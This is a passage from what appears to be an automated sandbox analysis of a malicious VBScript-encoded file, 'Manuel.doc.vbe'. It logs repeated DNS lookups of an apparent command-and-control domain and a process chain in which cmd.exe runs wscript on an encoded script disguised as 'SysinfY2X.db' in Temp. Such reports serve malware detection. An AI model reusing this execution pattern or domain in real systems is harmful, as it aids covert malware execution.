                      Mar 16, 2021 14:13:33.307555914 CET5931953192.168.2.228.8.8.8
                      Mar 16, 2021 14:13:33.366475105 CET53593198.8.8.8192.168.2.22
                      Mar 16, 2021 14:13:33.367247105 CET5931953192.168.2.228.8.8.8
                      Mar 16, 2021 14:13:33.418051958 CET53593198.8.8.8192.168.2.22
                      Mar 16, 2021 14:13:33.459680080 CET5307053192.168.2.228.8.8.8
                      Mar 16, 2021 14:13:33.517343044 CET53530708.8.8.8192.168.2.22
                      Mar 16, 2021 14:13:41.576530933 CET5977053192.168.2.228.8.8.8
                      Mar 16, 2021 14:13:41.633691072 CET53597708.8.8.8192.168.2.22
                      Mar 16, 2021 14:13:41.634407997 CET5977053192.168.2.228.8.8.8
                      Mar 16, 2021 14:13:41.683079958 CET53597708.8.8.8192.168.2.22
                      Mar 16, 2021 14:13:41.713466883 CET6152353192.168.2.228.8.8.8
                      Mar 16, 2021 14:13:41.778163910 CET53615238.8.8.8192.168.2.22
                      Mar 16, 2021 14:13:49.709429979 CET6279153192.168.2.228.8.8.8
                      Mar 16, 2021 14:13:49.769277096 CET53627918.8.8.8192.168.2.22
                      Mar 16, 2021 14:13:49.770279884 CET6279153192.168.2.228.8.8.8
                      Mar 16, 2021 14:13:49.832468987 CET53627918.8.8.8192.168.2.22
                      Mar 16, 2021 14:13:49.863528013 CET5066753192.168.2.228.8.8.8
                      Mar 16, 2021 14:13:49.912283897 CET53506678.8.8.8192.168.2.22
                      Mar 16, 2021 14:14:37.762933969 CET5412953192.168.2.228.8.8.8
                      Mar 16, 2021 14:14:37.811857939 CET53541298.8.8.8192.168.2.22
                      Mar 16, 2021 14:14:37.822923899 CET6532953192.168.2.228.8.8.8
                      Mar 16, 2021 14:14:37.872899055 CET53653298.8.8.8192.168.2.22
                      Mar 16, 2021 14:14:37.874123096 CET6532953192.168.2.228.8.8.8
                      Mar 16, 2021 14:14:37.923952103 CET53653298.8.8.8192.168.2.22
                      Mar 16, 2021 14:14:46.037239075 CET6071853192.168.2.228.8.8.8
                      Mar 16, 2021 14:14:46.086708069 CET53607188.8.8.8192.168.2.22
                      Mar 16, 2021 14:14:46.094744921 CET4915753192.168.2.228.8.8.8
                      Mar 16, 2021 14:14:46.156150103 CET53491578.8.8.8192.168.2.22
                      Mar 16, 2021 14:14:53.750132084 CET5739153192.168.2.228.8.8.8
                      Mar 16, 2021 14:14:53.807447910 CET53573918.8.8.8192.168.2.22
                      Mar 16, 2021 14:14:53.819434881 CET6185853192.168.2.228.8.8.8
                      Mar 16, 2021 14:14:53.879494905 CET53618588.8.8.8192.168.2.22
                      Mar 16, 2021 14:15:41.380919933 CET6250053192.168.2.228.8.8.8
                      Mar 16, 2021 14:15:41.432496071 CET53625008.8.8.8192.168.2.22
                      Mar 16, 2021 14:15:41.441082001 CET5165253192.168.2.228.8.8.8
                      Mar 16, 2021 14:15:41.489866018 CET53516528.8.8.8192.168.2.22
                      Mar 16, 2021 14:15:41.490602016 CET5165253192.168.2.228.8.8.8
                      Mar 16, 2021 14:15:41.541111946 CET53516528.8.8.8192.168.2.22
                      Mar 16, 2021 14:15:49.645076990 CET6276253192.168.2.228.8.8.8
                      Mar 16, 2021 14:15:49.693998098 CET53627628.8.8.8192.168.2.22
                      Mar 16, 2021 14:15:49.738286972 CET5690553192.168.2.228.8.8.8
                      Mar 16, 2021 14:15:49.790009975 CET53569058.8.8.8192.168.2.22
                      Mar 16, 2021 14:15:57.685406923 CET5460953192.168.2.228.8.8.8
                      Mar 16, 2021 14:15:57.742578983 CET53546098.8.8.8192.168.2.22
                      Mar 16, 2021 14:15:57.786099911 CET5810153192.168.2.228.8.8.8
                      Mar 16, 2021 14:15:57.851095915 CET53581018.8.8.8192.168.2.22
                      Mar 16, 2021 14:16:45.370919943 CET6432953192.168.2.228.8.8.8
                      Mar 16, 2021 14:16:45.429102898 CET53643298.8.8.8192.168.2.22
                      Mar 16, 2021 14:16:45.429651976 CET6432953192.168.2.228.8.8.8
                      Mar 16, 2021 14:16:45.486975908 CET53643298.8.8.8192.168.2.22
                      Mar 16, 2021 14:16:45.533243895 CET6488153192.168.2.228.8.8.8
                      Mar 16, 2021 14:16:45.583925962 CET53648818.8.8.8192.168.2.22
                      Mar 16, 2021 14:16:53.604867935 CET5532753192.168.2.228.8.8.8
                      Mar 16, 2021 14:16:53.664835930 CET53553278.8.8.8192.168.2.22
                      Mar 16, 2021 14:16:53.665371895 CET5532753192.168.2.228.8.8.8
                      Mar 16, 2021 14:16:53.726489067 CET53553278.8.8.8192.168.2.22
                      Mar 16, 2021 14:16:53.766989946 CET5915053192.168.2.228.8.8.8
                      Mar 16, 2021 14:16:53.818923950 CET53591508.8.8.8192.168.2.22
                      Mar 16, 2021 14:17:01.680114985 CET6343953192.168.2.228.8.8.8
                      Mar 16, 2021 14:17:01.740062952 CET53634398.8.8.8192.168.2.22
                      Mar 16, 2021 14:17:01.740818024 CET6343953192.168.2.228.8.8.8
                      Mar 16, 2021 14:17:01.791455984 CET53634398.8.8.8192.168.2.22
                      Mar 16, 2021 14:17:01.832036018 CET6504053192.168.2.228.8.8.8
                      Mar 16, 2021 14:17:02.838766098 CET6504053192.168.2.228.8.8.8
                      Mar 16, 2021 14:17:02.888588905 CET53650408.8.8.8192.168.2.22
                      Mar 16, 2021 14:17:03.037971020 CET53650408.8.8.8192.168.2.22
                      Mar 16, 2021 14:17:49.334805965 CET6136953192.168.2.228.8.8.8
                      Mar 16, 2021 14:17:49.385081053 CET53613698.8.8.8192.168.2.22
                      Mar 16, 2021 14:17:49.398439884 CET6551553192.168.2.228.8.8.8
                      Mar 16, 2021 14:17:49.450118065 CET53655158.8.8.8192.168.2.22
                      Mar 16, 2021 14:17:57.571419954 CET6023653192.168.2.228.8.8.8
                      Mar 16, 2021 14:17:57.623168945 CET53602368.8.8.8192.168.2.22
                      Mar 16, 2021 14:17:57.667422056 CET5319853192.168.2.228.8.8.8
                      Mar 16, 2021 14:17:57.716074944 CET53531988.8.8.8192.168.2.22
                      Mar 16, 2021 14:18:06.706988096 CET5002753192.168.2.228.8.8.8
                      Mar 16, 2021 14:18:06.766937017 CET53500278.8.8.8192.168.2.22
                      Mar 16, 2021 14:18:06.767512083 CET5002753192.168.2.228.8.8.8
                      Mar 16, 2021 14:18:06.818988085 CET53500278.8.8.8192.168.2.22
                      Mar 16, 2021 14:18:06.851181984 CET5924553192.168.2.228.8.8.8
                      Mar 16, 2021 14:18:06.908276081 CET53592458.8.8.8192.168.2.22
                      Mar 16, 2021 14:18:53.360168934 CET5584053192.168.2.228.8.8.8
                      Mar 16, 2021 14:18:53.515125990 CET53558408.8.8.8192.168.2.22
                      Mar 16, 2021 14:18:53.515721083 CET5584053192.168.2.228.8.8.8
                      Mar 16, 2021 14:18:53.572951078 CET53558408.8.8.8192.168.2.22
                      Mar 16, 2021 14:18:53.604624987 CET6166753192.168.2.228.8.8.8
                      Mar 16, 2021 14:18:53.665950060 CET53616678.8.8.8192.168.2.22
                      Mar 16, 2021 14:19:01.712400913 CET6373653192.168.2.228.8.8.8
                      Mar 16, 2021 14:19:01.772490025 CET53637368.8.8.8192.168.2.22
                      Mar 16, 2021 14:19:01.772929907 CET6373653192.168.2.228.8.8.8
                      Mar 16, 2021 14:19:01.824675083 CET53637368.8.8.8192.168.2.22
                      Mar 16, 2021 14:19:01.862140894 CET5980553192.168.2.228.8.8.8
                      Mar 16, 2021 14:19:01.911077976 CET53598058.8.8.8192.168.2.22
                      Mar 16, 2021 14:19:10.712254047 CET6232253192.168.2.228.8.8.8
                      Mar 16, 2021 14:19:10.769421101 CET53623228.8.8.8192.168.2.22
                      Mar 16, 2021 14:19:10.770631075 CET6232253192.168.2.228.8.8.8
                      Mar 16, 2021 14:19:10.819334984 CET53623228.8.8.8192.168.2.22
                      Mar 16, 2021 14:19:10.868002892 CET5281953192.168.2.228.8.8.8
                      Mar 16, 2021 14:19:10.924978971 CET53528198.8.8.8192.168.2.22

                      ICMP Packets

                      TimestampSource IPDest IPChecksumCodeType
                      Mar 16, 2021 14:17:03.038120985 CET192.168.2.228.8.8.8d014(Port unreachable)Destination Unreachable

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Mar 16, 2021 14:11:25.345366001 CET192.168.2.228.8.8.80xad13Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:11:25.558363914 CET192.168.2.228.8.8.80x959bStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:11:33.597986937 CET192.168.2.228.8.8.80x51f2Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:11:33.663414955 CET192.168.2.228.8.8.80x4aa4Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:11:41.739949942 CET192.168.2.228.8.8.80x92f1Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:11:41.814532995 CET192.168.2.228.8.8.80xd9c8Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:12:29.279630899 CET192.168.2.228.8.8.80x82b3Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:12:29.375546932 CET192.168.2.228.8.8.80x71ddStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:12:37.574986935 CET192.168.2.228.8.8.80x70c0Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:12:37.632877111 CET192.168.2.228.8.8.80x70c0Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:12:37.736078024 CET192.168.2.228.8.8.80x3714Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:12:45.731780052 CET192.168.2.228.8.8.80xa163Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:12:45.794931889 CET192.168.2.228.8.8.80xa163Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:12:45.902149916 CET192.168.2.228.8.8.80x7adaStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:33.307555914 CET192.168.2.228.8.8.80xfc39Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:33.367247105 CET192.168.2.228.8.8.80xfc39Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:33.459680080 CET192.168.2.228.8.8.80xc229Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:41.576530933 CET192.168.2.228.8.8.80xa6edStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:41.634407997 CET192.168.2.228.8.8.80xa6edStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:41.713466883 CET192.168.2.228.8.8.80x758fStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:49.709429979 CET192.168.2.228.8.8.80xd517Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:49.770279884 CET192.168.2.228.8.8.80xd517Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:49.863528013 CET192.168.2.228.8.8.80xd9fbStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:14:37.762933969 CET192.168.2.228.8.8.80xc6ccStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:14:37.822923899 CET192.168.2.228.8.8.80xfe5fStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:14:37.874123096 CET192.168.2.228.8.8.80xfe5fStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:14:46.037239075 CET192.168.2.228.8.8.80xf75cStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:14:46.094744921 CET192.168.2.228.8.8.80xd43aStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:14:53.750132084 CET192.168.2.228.8.8.80x5cccStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:14:53.819434881 CET192.168.2.228.8.8.80x5b5eStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:15:41.380919933 CET192.168.2.228.8.8.80x1e93Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:15:41.441082001 CET192.168.2.228.8.8.80x7d35Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:15:41.490602016 CET192.168.2.228.8.8.80x7d35Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:15:49.645076990 CET192.168.2.228.8.8.80xe897Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:15:49.738286972 CET192.168.2.228.8.8.80x8807Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:15:57.685406923 CET192.168.2.228.8.8.80xd627Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:15:57.786099911 CET192.168.2.228.8.8.80x4ed4Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:45.370919943 CET192.168.2.228.8.8.80x21e1Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:45.429651976 CET192.168.2.228.8.8.80x21e1Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:45.533243895 CET192.168.2.228.8.8.80x6365Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:53.604867935 CET192.168.2.228.8.8.80xdce8Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:53.665371895 CET192.168.2.228.8.8.80xdce8Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:53.766989946 CET192.168.2.228.8.8.80x4fe2Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:01.680114985 CET192.168.2.228.8.8.80x52ffStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:01.740818024 CET192.168.2.228.8.8.80x52ffStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:01.832036018 CET192.168.2.228.8.8.80x79ddStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:02.838766098 CET192.168.2.228.8.8.80x79ddStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:49.334805965 CET192.168.2.228.8.8.80x868Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:49.398439884 CET192.168.2.228.8.8.80xac78Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:57.571419954 CET192.168.2.228.8.8.80x774Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:57.667422056 CET192.168.2.228.8.8.80xffdcStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:06.706988096 CET192.168.2.228.8.8.80x37deStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:06.767512083 CET192.168.2.228.8.8.80x37deStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:06.851181984 CET192.168.2.228.8.8.80xe07bStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:53.360168934 CET192.168.2.228.8.8.80x77b3Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:53.515721083 CET192.168.2.228.8.8.80x77b3Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:53.604624987 CET192.168.2.228.8.8.80x6fffStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:01.712400913 CET192.168.2.228.8.8.80x4223Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:01.772929907 CET192.168.2.228.8.8.80x4223Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:01.862140894 CET192.168.2.228.8.8.80x1077Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:10.712254047 CET192.168.2.228.8.8.80x8611Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:10.770631075 CET192.168.2.228.8.8.80x8611Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:10.868002892 CET192.168.2.228.8.8.80x22aStandard query (0)realy.mooo.comA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Mar 16, 2021 14:11:25.539060116 CET8.8.8.8192.168.2.220xad13No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:11:25.615609884 CET8.8.8.8192.168.2.220x959bNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:11:33.647744894 CET8.8.8.8192.168.2.220x51f2No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:11:33.712110043 CET8.8.8.8192.168.2.220x4aa4No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:11:41.799628973 CET8.8.8.8192.168.2.220x92f1No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:11:41.980848074 CET8.8.8.8192.168.2.220xd9c8No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:12:29.339890003 CET8.8.8.8192.168.2.220x82b3No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:12:29.553565025 CET8.8.8.8192.168.2.220x71ddNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:12:37.632074118 CET8.8.8.8192.168.2.220x70c0No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:12:37.690121889 CET8.8.8.8192.168.2.220x70c0No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:12:37.796623945 CET8.8.8.8192.168.2.220x3714No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:12:45.794179916 CET8.8.8.8192.168.2.220xa163No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:12:45.854865074 CET8.8.8.8192.168.2.220xa163No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:12:45.959362030 CET8.8.8.8192.168.2.220x7adaNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:33.366475105 CET8.8.8.8192.168.2.220xfc39No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:33.418051958 CET8.8.8.8192.168.2.220xfc39No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:33.517343044 CET8.8.8.8192.168.2.220xc229No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:41.633691072 CET8.8.8.8192.168.2.220xa6edNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:41.683079958 CET8.8.8.8192.168.2.220xa6edNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:41.778163910 CET8.8.8.8192.168.2.220x758fNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:49.769277096 CET8.8.8.8192.168.2.220xd517No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:49.832468987 CET8.8.8.8192.168.2.220xd517No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:13:49.912283897 CET8.8.8.8192.168.2.220xd9fbNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:14:37.811857939 CET8.8.8.8192.168.2.220xc6ccNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:14:37.872899055 CET8.8.8.8192.168.2.220xfe5fNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:14:37.923952103 CET8.8.8.8192.168.2.220xfe5fNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:14:46.086708069 CET8.8.8.8192.168.2.220xf75cNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:14:46.156150103 CET8.8.8.8192.168.2.220xd43aNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:14:53.807447910 CET8.8.8.8192.168.2.220x5cccNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:14:53.879494905 CET8.8.8.8192.168.2.220x5b5eNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:15:41.432496071 CET8.8.8.8192.168.2.220x1e93No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:15:41.489866018 CET8.8.8.8192.168.2.220x7d35No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:15:41.541111946 CET8.8.8.8192.168.2.220x7d35No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:15:49.693998098 CET8.8.8.8192.168.2.220xe897No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:15:49.790009975 CET8.8.8.8192.168.2.220x8807No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:15:57.742578983 CET8.8.8.8192.168.2.220xd627No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:15:57.851095915 CET8.8.8.8192.168.2.220x4ed4No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:45.429102898 CET8.8.8.8192.168.2.220x21e1No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:45.486975908 CET8.8.8.8192.168.2.220x21e1No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:45.583925962 CET8.8.8.8192.168.2.220x6365No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:53.664835930 CET8.8.8.8192.168.2.220xdce8No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:53.726489067 CET8.8.8.8192.168.2.220xdce8No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:53.818923950 CET8.8.8.8192.168.2.220x4fe2No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:01.740062952 CET8.8.8.8192.168.2.220x52ffNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:01.791455984 CET8.8.8.8192.168.2.220x52ffNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:02.888588905 CET8.8.8.8192.168.2.220x79ddNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:03.037971020 CET8.8.8.8192.168.2.220x79ddNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:49.385081053 CET8.8.8.8192.168.2.220x868No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:49.450118065 CET8.8.8.8192.168.2.220xac78No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:57.623168945 CET8.8.8.8192.168.2.220x774No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:57.716074944 CET8.8.8.8192.168.2.220xffdcNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:06.766937017 CET8.8.8.8192.168.2.220x37deNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:06.818988085 CET8.8.8.8192.168.2.220x37deNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:06.908276081 CET8.8.8.8192.168.2.220xe07bNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:53.515125990 CET8.8.8.8192.168.2.220x77b3No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:53.572951078 CET8.8.8.8192.168.2.220x77b3No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:53.665950060 CET8.8.8.8192.168.2.220x6fffNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:01.772490025 CET8.8.8.8192.168.2.220x4223No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:01.824675083 CET8.8.8.8192.168.2.220x4223No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:01.911077976 CET8.8.8.8192.168.2.220x1077No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:10.769421101 CET8.8.8.8192.168.2.220x8611No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:10.819334984 CET8.8.8.8192.168.2.220x8611No error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:10.924978971 CET8.8.8.8192.168.2.220x22aNo error (0)realy.mooo.com127.0.0.2A (IP address)IN (0x0001)

                      Code Manipulations

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      Analysis Process: wscript.exe PID: 2372 Parent PID: 1388

                      General

                      Start time:14:10:30
                      Start date:16/03/2021
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Manuel.doc.vbe'
                      Imagebase:0xffc50000
                      File size:168960 bytes
                      MD5 hash:045451FA238A75305CC26AC982472367
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: cmd.exe PID: 2560 Parent PID: 2372

                      General

                      Start time:14:10:31
                      Start date:16/03/2021
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:'C:\Windows\System32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
                      Imagebase:0x49e60000
                      File size:345088 bytes
                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: wscript.exe PID: 2300 Parent PID: 2560

                      General

                      Start time:14:10:32
                      Start date:16/03/2021
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
                      Imagebase:0xffc50000
                      File size:168960 bytes
                      MD5 hash:045451FA238A75305CC26AC982472367
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: cmd.exe PID: 2824 Parent PID: 1388

                      General

                      Start time:14:10:40
                      Start date:16/03/2021
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:'C:\WINDOWS\system32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
                      Imagebase:0x4a930000
                      File size:345088 bytes
                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: wscript.exe PID: 2704 Parent PID: 2824

                      General

                      Start time:14:10:40
                      Start date:16/03/2021
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
                      Imagebase:0xffc50000
                      File size:168960 bytes
                      MD5 hash:045451FA238A75305CC26AC982472367
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

